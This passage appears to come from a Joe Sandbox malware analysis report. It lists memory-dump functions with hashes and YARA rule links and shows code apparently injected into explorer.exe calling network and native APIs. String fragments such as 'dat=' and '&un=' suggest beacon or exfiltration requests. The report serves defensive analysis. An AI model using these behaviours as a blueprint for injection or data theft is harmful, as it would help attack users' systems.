String ID:
API String ID:
Opcode ID: de54b2bd0e7d4bdff2c8f0d371b196aa0b009a86312485b441bef650950dc526
Instruction ID: c0efc0fe2ae2291c782d58f04564f8c0d7a267627acf244c9671a0f139700746
Opcode Fuzzy Hash: de54b2bd0e7d4bdff2c8f0d371b196aa0b009a86312485b441bef650950dc526
Instruction Fuzzy Hash: F3F0A036301205DFEB05AF39D444CAA77AAEF893503104469FA088B324DB75EC01CBD0

Function 073BAC40 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce872683ccdbb5eddf34b1b73bf3d08ebf15b8c0700c48ee7d1372cbe23f56a0
Instruction ID: a33ee65f2a6c6a1503b814b3cf2d9be92ab85b56e838b29a4963d6485bd46e31
Opcode Fuzzy Hash: ce872683ccdbb5eddf34b1b73bf3d08ebf15b8c0700c48ee7d1372cbe23f56a0
Instruction Fuzzy Hash: F5F0F870200610CFC715DB2CD588C5977E9FF4971571145A9E14ACB772CB72EC80CB80

Function 073B4EB8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e11847a3c65e59be86e47d497ba345da157f939799b461f79ee4dca5baf69d
Instruction ID: cbc1d38f76989890dee524a529291ca91ed95d4cba83bf953e41d89be8639dba
Opcode Fuzzy Hash: 32e11847a3c65e59be86e47d497ba345da157f939799b461f79ee4dca5baf69d
Instruction Fuzzy Hash: 60E0C975D0520DFBCF40DFA4D986ACEBBB9EB48304F1081E5980AA3240EA365B19CB80

Function 073BA860 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5e7daae578de9de824d9076efcc3756d233631605f804dc881dc74fa0cb5cbc
Instruction ID: 1124f21fa494a0c7a27ad11003f4a55f6ccb798f7219e9da97777d7176362933
Opcode Fuzzy Hash: d5e7daae578de9de824d9076efcc3756d233631605f804dc881dc74fa0cb5cbc
Instruction Fuzzy Hash: BAE092322083824FC706976CA89148AFBE2EED52103598A6BD2858B226DB6058878395

Function 073BFD51 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 263dcec4da25975122ffe77c54b8db32b098d135c9612063ba87eca92222f134
Instruction ID: ce5c1081b3747cd799a094d6f2465fc32dc06f22bb4fd6062c7e2585264028aa
Opcode Fuzzy Hash: 263dcec4da25975122ffe77c54b8db32b098d135c9612063ba87eca92222f134
Instruction Fuzzy Hash: 85E0D8312582808FD71A5B3CD5647E43FA19F49615F4800DED189C72F6CE604843C741

Function 073B8A12 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902c2296143e2cd0327de6577e842213c3cc98f340cfe8753291edd9d02f6024
Instruction ID: a08a3366ee7a2ead3b931176aa1bd6c1ed45b1aebbbc6cf615499cd90943e620
Opcode Fuzzy Hash: 902c2296143e2cd0327de6577e842213c3cc98f340cfe8753291edd9d02f6024
Instruction Fuzzy Hash: DAE0DF303497914FC72ACB2CD8A0994BFF29F4A21032E85DAE1C8CB662C620DC078304

Function 073BF910 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63b0dc9e83f85bc968541c9bf49e6393d619d12bb110f7c6fd60200f4b22f1c
Instruction ID: b750e9b5bc6d86d97a2e1312af244ab53b72acab1ea541525b4511529aa226ce
Opcode Fuzzy Hash: b63b0dc9e83f85bc968541c9bf49e6393d619d12bb110f7c6fd60200f4b22f1c
Instruction Fuzzy Hash: 04E06D313487908FD311A72894157DB7FD4AB46314F04049BD5CD9B292CBB6A9048797

Function 073B5638 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd58b274d1caee2eb4fe16cc6f50b3ab8b62f07b866d523a060adc910560ba02
Instruction ID: 4fbfcf38ec92b2e0196cf8cd8cec69133815ac47e62794c471db02d6189a9ab8
Opcode Fuzzy Hash: bd58b274d1caee2eb4fe16cc6f50b3ab8b62f07b866d523a060adc910560ba02
Instruction Fuzzy Hash: 23E07DF170052127D318A566D840B97F2AB9FC8A00F08C23DC50D87715EA21980186C0

Function 073B46BC Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb52366f7702cdd8831ec9072929b4b44e7fa823be65ec0d47b1721b163c4817
Instruction ID: 3d3f0514a2f20410302a2600033f0db5feab29d199678d3cea0664e4d72fce17
Opcode Fuzzy Hash: cb52366f7702cdd8831ec9072929b4b44e7fa823be65ec0d47b1721b163c4817
Instruction Fuzzy Hash: B9E0C2703226159FC728DE1CE880CEAB3EDEF893107188A6DF20AC3B20DA60FC054684

Function 073BD144 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a0f8296fa068ead943b8fae2b593d8318a06c3534643fa4e575b4bde0f90ca
Instruction ID: 274aad31bc50aa59130811df14b5a3f0102d5f7a260bed51a961ef61cc70e38f
Opcode Fuzzy Hash: 31a0f8296fa068ead943b8fae2b593d8318a06c3534643fa4e575b4bde0f90ca
Instruction Fuzzy Hash: 1CE04F707147519FE310A73C84187DB7BC8DB4A314F04549AE58E97792CBA2A8048796

Function 073B25B0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5941cd80ad37b96fb58b78c69f501bacf3a8f759ce590a5a4bf5fb580b5b8280
Instruction ID: 4edcf1018ad57d6571a08796b3aa1873cc8812aaeeb440cf712f119910db74c0
Opcode Fuzzy Hash: 5941cd80ad37b96fb58b78c69f501bacf3a8f759ce590a5a4bf5fb580b5b8280
Instruction Fuzzy Hash: CFD0A7313001684BEB1437B478142ED73CDEA8456A340007AE70EC7A10EEA5884042C5

Function 073BF8D8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c182cb6f88b0ad99c058debed1cbe440deb338885935b8988670299ccd7d503c
Instruction ID: 832e297525a9f20d4d602c4febca26f81c516e3bb1b71d5b9f556846cd7344fb
Opcode Fuzzy Hash: c182cb6f88b0ad99c058debed1cbe440deb338885935b8988670299ccd7d503c
Instruction Fuzzy Hash: 88D05B753200249BEA44A66CD45466976CEDFC5B54F0000A5D60DDBB91CD65DC0087D2

Function 073B2593 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 251fe2e9a2c95181a0c895875916fc4de52420bf9b9616675d07414972c25ade
Instruction ID: 6ebc840a425c2c3e5e0fc963f92e07fe7c9956769bc6798bac5f190c45082202
Opcode Fuzzy Hash: 251fe2e9a2c95181a0c895875916fc4de52420bf9b9616675d07414972c25ade
Instruction Fuzzy Hash: 79E0127AA0110DEFDF00CF80E951BDEBB32FB88311F208016FA0526290C7325A62EB90

Function 073B5E52 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2feaad67239b4480201e25887e459712a835e2db894aeb81ac34d6ed595ebea
Instruction ID: 9bb346295beb7128b2e5e4881d5c65d0506f8a11e6ee9bdaf8fe33b4c42fc07f
Opcode Fuzzy Hash: f2feaad67239b4480201e25887e459712a835e2db894aeb81ac34d6ed595ebea
Instruction Fuzzy Hash: 1DE08C392491948FC7028B38D0648A87FB69F0A31032A80DBEA84CB262CA348C16CB45

Function 073BB692 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b40fb0b8243c3788aa450a3907eec20b0fd38861d9b6fe2e02ed61f5519d8f
Instruction ID: df68f4a1e7527b8e52db56dc6e34b9bfd5bfc2cfee19bc6f94f29ad70d4b85f2
Opcode Fuzzy Hash: a1b40fb0b8243c3788aa450a3907eec20b0fd38861d9b6fe2e02ed61f5519d8f
Instruction Fuzzy Hash: 44D02EF404D2CA8FE3322BA0A4243F0BF340E4A20030800EAC28D89813DF108C4ACB52

Function 073B25A0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71ec4371236d8e8125ea7c8b13fd039925d11c2ec9194ca356c9152f4e8fadbd
Instruction ID: d102ff7967344bb4c0b9e4b5c26c61627951dd5279d94c8642c48a272edba6ba
Opcode Fuzzy Hash: 71ec4371236d8e8125ea7c8b13fd039925d11c2ec9194ca356c9152f4e8fadbd
Instruction Fuzzy Hash: FFD0223221053503E71450B5AC823D773CCEB84222F444432E60CC2700E885C80140D4

Function 073BFD60 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8ee1bfba9ebe46b69bc29b9422da7966df2dd360ac9ce7b738f6d1995e7fd5
Instruction ID: c1b43d20a81124c66d06ec502360fbccf96b88492c92338969a7f827194e89bd
Opcode Fuzzy Hash: db8ee1bfba9ebe46b69bc29b9422da7966df2dd360ac9ce7b738f6d1995e7fd5
Instruction Fuzzy Hash: D6D01231354114CFE6186B3DD408BE937D9AB48625F44406DE50D876A1CE645C418BD1

Function 073BF978 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed84b94d90829046f028cce7c51d3da84196cdae493681d85ce68730883177ab
Instruction ID: e8be29087d0e184da32db17371d6020dc82e473605548b28a972c259c5b67ce5
Opcode Fuzzy Hash: ed84b94d90829046f028cce7c51d3da84196cdae493681d85ce68730883177ab
Instruction Fuzzy Hash: 39E0C23424C3949FD3015B7CE8664A57FE8AF0B210B0940EBE4C9D3373CA585C44CB96

Function 073BEAC8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc4a1ab7c28b46458def19ba3f78634c2748bf9c162c38866cfeda8a174bbfb
Instruction ID: c83d148153ce55be4207fca4b7c37f24edbea4f8993f33600b0f9b0ba7e69354
Opcode Fuzzy Hash: 7bc4a1ab7c28b46458def19ba3f78634c2748bf9c162c38866cfeda8a174bbfb
Instruction Fuzzy Hash: 47D05EE120C2E88FE7171BB455213FA3F751F46A09B0800CAC1DC9B657EB250822D35A

Function 073BB6A0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 670494fb4dab6bae9be6c5c3ec12401e79d832c0d64c26f09d89cbb1e5ee2a0c
Instruction ID: 5589c6135037c88f8b3f60bd4e9eb471c98c45dbefb57b3cef8f8119bb149be1
Opcode Fuzzy Hash: 670494fb4dab6bae9be6c5c3ec12401e79d832c0d64c26f09d89cbb1e5ee2a0c
Instruction Fuzzy Hash: F4D012F026460F87EB345BA5B4697B5F7EC9F48705B040078F60EC5E40EF56EC819A11

Function 073B5E60 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d29774e0026174ded4742f4769b3c5edd47cd58598b7916207a49588fd89fb
Instruction ID: cdeb3fe12c438d736fbc495e202716f5beeb514fa71d6a01ab8b97827cff94c5
Opcode Fuzzy Hash: 00d29774e0026174ded4742f4769b3c5edd47cd58598b7916207a49588fd89fb
Instruction Fuzzy Hash: 95D0C93A3141289F87049B68E408CA9BBEDEB4D7617118067FA09CB361CE71DC108BD4

Function 073B23C2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56fef4ba0f70f4f75e16afed849b20e5d00e46f2f27671fec2e8dca1b555d5d
Instruction ID: 3965567d216996b6060f6696ac9f18a2c6398333cf66514a9308f7f31230c1ec
Opcode Fuzzy Hash: e56fef4ba0f70f4f75e16afed849b20e5d00e46f2f27671fec2e8dca1b555d5d
Instruction Fuzzy Hash: A2D09E36140109FFCB05CF55D945D963B75EF48710F048454FA0857231C372D821DB90

Function 073BF988 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2f1e2d6e0faa661ec78eba53c209f2428326d72df22a747141c4a3672a0230a
Instruction ID: f32d691aef4859d7f9caac2a1a9deb270efb67e24b07653cfabcc587635149bb
Opcode Fuzzy Hash: c2f1e2d6e0faa661ec78eba53c209f2428326d72df22a747141c4a3672a0230a
Instruction Fuzzy Hash: E6D022343443248FC2049BACE0089AA3BECAF0A620F0400EBF40EC3323CE50AC4087D1

Function 073B23C8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90

Function 073BEAD8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86f94b000d87fcf0dbc1a91844b4edd7be328753df1b3f3bf5635fdfad3efac
Instruction ID: 2c5679d174760fd26a802cacca03eaae22b8ca6f9e6cb35b880a766ce4fd2290
Opcode Fuzzy Hash: d86f94b000d87fcf0dbc1a91844b4edd7be328753df1b3f3bf5635fdfad3efac
Instruction Fuzzy Hash: F7C08CF12086AC83E524329860007EE72CD4B48624F00001AD20D4BA41EFA51C0142CF

Function 073B2A00 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf49eaaff1695f9916c32340b60687dd9071211be7d48ac898d27c7f9957913e
Instruction ID: f09023ba8cee5a5f70265aed7ea251c8298ab2698a18d594af51ff5e98edf632
Opcode Fuzzy Hash: bf49eaaff1695f9916c32340b60687dd9071211be7d48ac898d27c7f9957913e
Instruction Fuzzy Hash: 3BB0928A40025292FB10E6398CE2BE37B26DB80A08F9CD420821885E02D56D88139202

Function 073B258A Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
Instruction ID: 40146d297dc3e926723b73dec39f2f76a48079e73b4e3fd29111787e27be5857
Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
Instruction Fuzzy Hash: D1B092B7A0400D89EB108A84B4913EEF724F780225F104123C7155684193B2016496E1

Function 073B19EC Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7353faf3d6b2205b4be863a60b6f8ecff8476b3e9dfbd6efab992971c51717c
Instruction ID: 40b7451fc6362beaded015b1bd9b4a88bd1771bc0527ce7d97c32afd9a81b754
Opcode Fuzzy Hash: e7353faf3d6b2205b4be863a60b6f8ecff8476b3e9dfbd6efab992971c51717c
Instruction Fuzzy Hash: A2B012CCA10001917520E5390CE05F72117E6C2610BC4ED04170E60C06CC1590020006

Analysis Process: explorer.exePID: 4004, Parent PID: 6112COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.3%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 0E396F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0E39712E
setsockopt.WS2_32 ref: 0E397830
recv.WS2_32 ref: 0E397859

Strings

nnec, xrefs: 0E39732A
tion, xrefs: 0E397331
Co, xrefs: 0E397323
GET , xrefs: 0E397318
&br=, xrefs: 0E397509
&sql, xrefs: 0E397471
dat=, xrefs: 0E397290
ose, xrefs: 0E39733F
: cl, xrefs: 0E397338
&un=, xrefs: 0E3974F1

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 7ece5358f4a1e0c2f57583372c0e13c1b7fa05149f7eb4a6b249eacdddcbd531
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 16529231628A088FDB29EF68C4947E9BBE1FB54300F50496EC49FC7286DF34A945D781

Function 0E396232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0E396449

Strings

`, xrefs: 0E39641D

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 838cbfe9e6580c98cead1ea9860d30e25c276bd365d1a5eec4826e9425f51280
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: C2224C70A29A099FCB59DF68C4996AEFBF1FB98301F40462ED45ED3250DB30E851DB81

Function 0E397E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E397E67

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: ffc1e023cdbe8621a7769d195fcb29e40efe830795309fd3bb0643df3ca33037
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: B7019E30628B484F8B88EF6C948122AB7E4FBC9214F000B3EE99AC3250EB60C9414742

Function 0E397E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E397E67

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 5ae1c785b8572d9b288d41986f43efd7850e059605e999e972309dc599d86735
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: CA016234628B884B8B48EB7C94552A6B7E5FBCE314F400B7EE99AC3251DB65D9024782

Function 0E3918C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E3919A0

Strings

urlmon.dll, xrefs: 0E391959
User-Agent: , xrefs: 0E391935, 0E391948
nt: , xrefs: 0E39191E
on.d, xrefs: 0E391902

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: feec03a44fa0ff8b3f274f7793364b238500459097a405cbee5df3f33c3b90a2
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 2531BD31614A0D8BCF55EFA8C8847EEBBE1FB98214F40462AD45EE7240DF788A45C789

Function 0E3918BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E3919A0

Strings

urlmon.dll, xrefs: 0E391959
User-Agent: , xrefs: 0E391935, 0E391948
nt: , xrefs: 0E39191E
on.d, xrefs: 0E391902

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 12b7ad1156aa463bfba979d64a5de0300a3019dd7d9262c94210feddfe8a0855
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: F7219171614A4D8BCF15EFA8C8847EEBBF1FF59204F40462AD45AE7240DF748A45C789

Function 0E38DB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0E38DCCA

Strings

.dll, xrefs: 0E38DBCD
el32, xrefs: 0E38DBA0
kern, xrefs: 0E38DB99

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: c9a79e0935cba4114502145529831db2498b208d4e7794614847f3f0bef9b0b4
